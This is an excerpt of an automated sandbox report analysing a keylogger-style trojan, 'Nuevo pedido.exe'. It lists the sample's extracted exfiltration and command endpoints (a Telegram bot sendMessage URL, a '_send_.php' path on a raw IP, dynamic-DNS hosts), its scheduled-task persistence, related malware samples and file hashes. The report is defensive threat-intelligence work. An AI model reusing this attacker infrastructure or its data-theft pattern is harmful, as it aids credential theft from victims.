https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.jiyu-kobo.co.jp/	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
50.31.176.103	unknown	United States	23352	SERVERCENTRALUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586800
Start date and time:	2025-01-09 16:35:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Nuevo pedido.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/15@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 288 Number of non-executed functions: 24
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.175.87.197, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Nuevo pedido.exe

Simulations

Behavior and APIs

Time	Type	Description
10:35:58	API Interceptor	5362093x Sleep call for process: Nuevo pedido.exe modified
10:36:00	API Interceptor	33x Sleep call for process: powershell.exe modified
10:36:03	API Interceptor	321171x Sleep call for process: QGVhHsAOjb.exe modified
15:36:01	Task Scheduler	Run new task: QGVhHsAOjb path: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse
	gem1.exe	Get hash	malicious	Unknown	Browse
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	PO.exe	Get hash	malicious	MassLogger RAT	Browse
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
193.122.130.0	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
api.telegram.org	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	172.64.155.59
	https://ccml.io/	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://readermodeext.info	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://bryf.atchirlisc.ru/EeMAGvIe/	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	http://readermodeext.info	Get hash	malicious	Unknown	Browse	1.1.1.1
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	24EPV9vjc5.exe	Get hash	malicious	Unknown	Browse	172.67.174.91
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	104.21.80.52
ORACLE-BMC-31898US	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	miori.x86.elf	Get hash	malicious	Unknown	Browse	140.204.251.205
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
SERVERCENTRALUS	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	50.31.176.165
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	205.234.141.183
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	216.246.5.240
	file.exe	Get hash	malicious	LummaC Stealer	Browse	50.31.176.165
	https://lcatterton.adobesign.gr.com/ryani8QmoTxrrisAT5lc4kattertoTxni8Qc4koTxm	Get hash	malicious	HTMLPhisher	Browse	216.246.46.135
	https://its.publimpres.com/northampton.edu/&adfs/ls/client-request-id=7c724&wa=wsignin10.html	Get hash	malicious	Unknown	Browse	216.246.46.21
	https://lumanity-chemisphere.qt9qms.app/	Get hash	malicious	HTMLPhisher	Browse	50.31.141.222
	zam.exe	Get hash	malicious	Snake Keylogger	Browse	50.31.176.103
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	50.31.176.103
	pedido.pif.exe	Get hash	malicious	Snake Keylogger	Browse	50.31.176.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://cipassoitalia.it	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	s7.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220
	chrtrome22.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Purchase Order A2409002.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Nuevo pedido.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QGVhHsAOjb.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.3810236212315665
Encrypted:	false
SSDEEP:	48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZmUyus:lGLHxv2IfLZ2KRH6Ouggs
MD5:	26F6E40F3C8972F2060C0201AD73BE4F
SHA1:	5F5B7154A29951D2BB6DD8E3E8C242A0EE7972BB
SHA-256:	82FFFB95FE80EDC9333F96C2051E2CA1C7A40DFA387059211394CB43E2CA5CEA
SHA-512:	F10D637941C0E617F9C46CA4AE5369B438F7BACFD7B8FC5C145F63F6ED6AD431E72BE4DE3E86EBA2FA0FFAEC2D1972C0EF35E862F2C2805B2EF703B0BCB349F9
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qjtqfyh.skt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aimco0bs.jjr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tryn3kff.fcu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueetucie.go3.ps1

Download File

